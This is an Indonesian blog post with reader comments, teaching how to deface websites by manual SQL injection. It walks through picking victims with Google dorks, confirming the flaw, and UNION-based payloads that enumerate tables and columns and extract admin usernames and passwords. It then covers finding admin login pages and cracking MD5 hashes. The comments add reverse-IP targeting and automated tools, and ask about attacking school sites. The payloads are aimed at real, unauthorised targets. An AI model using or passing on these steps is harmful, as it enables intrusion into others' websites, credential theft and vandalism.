Cara Deface Web Dengan SQL Manual - Banyak cara yang dapat dilakukan untuk deface sebuah web, salah satunya yaitu dengan teknik SQL Injection. Banyak sekali para hacker/defacer yang menggunakan cara ini. Dan saya akan menunjukkan langkah-langkahnya.
1. Anda cari target web untuk di di deface menggunakan dork. Bisa anda cari disini
2. Ketikkan dork itu di kotak pencarian google, maka akan muncul banyak web di hasil pencarian. Silahkan anda buka salah satu
3. Tambahkan karakter ' pada akhir url'nya untuk mengetahui vulnerability'nya
Contoh : www.site.com/news.php?id=32'
4. Jika muncul tulisan seperti "syntax error" berarti web tersebut vuln alias bisa kita deface
Contoh errornya : warning: mysql_fetch_array(): supplied argument is not a valid MYSQL result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line
5. Sekarang saatnya kita beraksi. Cari jumlah table yang ada pada database web tersebut dengan cara menambahkan karakter +order+by+1-- di belakang url
Contoh : www.site.com/news.php?id=32+order+by+1--
Anda coba satu persatu hingga muncul tulisan error.
Contoh : www.site.com/news.php?id=32+order+by+2--
www.site.com/news.php?id=32+order+by+3--
www.site.com/news.php?id=32+order+by+4--
Saya memisalkan jumlah table web ada 4 (errornya di 4)
6. Kemudian kita gunakan perintah union untuk mengeluarkan nomor yang nantinya kita gunakan. Tambahkan +union+select+1,2,3,4--
Contoh : www.site.com/news.php?id=32+union+select+1,2,3,4--
Saya memisalkan angka 3 yang keluar
7. Sekarang masukkan version() pada angka 3 untuk memaparkan version
Contoh : www.site.com/news.php?id=32+union+select+1,2,version(),4--
8. Kita munculkan nama - nama table yang ada pada web tersebut dengan memasukkan perintah table_name pada angka 3 dan perintah +from+information_schema.tables-- dibelakang url
Contoh : www.site.com/news.php?id=32+union+select+1,2,table_name,4+from+information_schema.tables--
Nantinya kita akan melihat nama nama table yang ada pada web
9. Kita lihat isi yang ada di dalam table tersebut dengan memasukkan perintah group_concat(table_name) pada angka 3 dan perintah +where+table_schema=database()-- di akhir url
Contoh : www.site.com/news.php?id=32+union+select+1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()--
10. Selanjutnya kita keluarkan isi yang ada di table tersebut (column) dengan memasukkan perintah group_concat(column_name) pada angka 3 dan +from+information_schema.columns+where+table_name=0xHasilConvertTextTableAdmin-- di akhir url
Untuk langkah ke 10 ini silahkan anda convert terlebih dahulu text nama table'nya ke hexadecimal disini
Jadi misalkan nama table'nya tadi admin maka jika di convert akan menjadi 61646D696E
Contoh : www.site.com/news.php?id=32+union+select+1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=0x61646D696E--
Nanti akan muncul column yang berisikan username dan password
11. Lalu kita lihat isi dari column yang kita temukan. Saya misalkan nama tablenya adalah admin, dan isi dari table admin adalah column username & password. Maka masukkan perintah concat_ws(0x3a,"nama column yang ada di dalam table admin") pada angka 3 dan perintah +from+Admin-- di akhir url
Contoh : www.site.com/news.php?id=32+union+select+1,2,concat_ws(0x3a,"username,password"),4+from+Admin--
12. Maka kita akan melihat username dan password admin dari web tersebut. Saatnya kita eksekusi.
13. Cari admin pagenya, biasanya dengan menambahkan tulisan berikut di akhir url web target.
/admin/ , /administrator/ , /webadmin/ , /adm/ , /webbase/
Contoh : www.site.com/admin/
Nah isikan username dan password yang tadi di dapat. Jika password berbentuk MD5 seperti e10adc3949ba59abbe56e057f20f883e, anda crack dulu disini
Memang tidaklah semudah membalik telapak tangan, belajarlah sedikit sedikit.
wah mantap izin simak aja sob , soalny bingung...
BalasHapusbtw apa bisa praktek di hp ?
-kata bijak-
malu bertanya sesat di jalan .
banyak bertanya malu di jalan .
Boleh donk bagi script blog nya??
BalasHapusAngga : whahaha... bagus tuh kata bijaknya
BalasHapusIlham : wew script blog apa gan maksudnya?
:( site nya udah pada gak perawan
BalasHapusRory : haha jangan bersedih bro, masih ada kok yg masih belum tersentuh, tetap mencari :D
BalasHapusmantap tpimasih kurang faham bro bisa ajari gak gak gan ane minta alamt fbnya aja
BalasHapuskalau bingung pake havij/sqli helper aja gan :)
BalasHapuspusing muter" tetap gagal (h)
BalasHapusmemang tdk mudah gan :-t
BalasHapus(h)
BalasHapusKomentar ini telah dihapus oleh administrator blog.
BalasHapus6. Kemudian kita gunakan perintah union untuk mengeluarkan nomor yang nantinya kita gunakan. Tambahkan +union+select+1,2,3,4--
BalasHapusContoh : www.site.com/news.php?id=32+union+select+1,2,3,4--
Saya memisalkan angka 3 yang keluar :-?
cara tau yang keluar nomer 3 gimana
ya itu menggunakan perintah union, +union+select+1,2,3,4-- tergantung dimana letaknya error. Kalau errornya di +order+by+2 ya menggunakan +union+select+1,2--
Hapus
BalasHapusQuery:
select * from aw_press_release WHERE pknewsid=28www.site.com/news.php?id=32 union select 1,2,3,4,5,6--
Mysql Response:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?id=32 union select 1,2,3,4,5,6--' at line 1
itu berarti yg keluar angka 1? sorry kepo gan :)
bukan gan [-( angkanya itu muncul dalam bentuk angka misal 3 atau malah 2 angka, 3 dan 4 (misalnya)
Hapusmuncul nya dimana gan
Hapuskalo alamat webnya kita yg nentuin gimana caranya gan
BalasHapuspake teknik reverse ip gan. Jadi, anda harus cari web lain yang ip'nya sama dengan web yang anda target. Ntar bisa dicari web lain dengan ip yang sama yang vuln untuk di deface dengan teknik sql.
Hapusmaksudnya web lain itu apa sob?
Hapuskalau .sch caranya gimana? apakah sama?
BalasHapus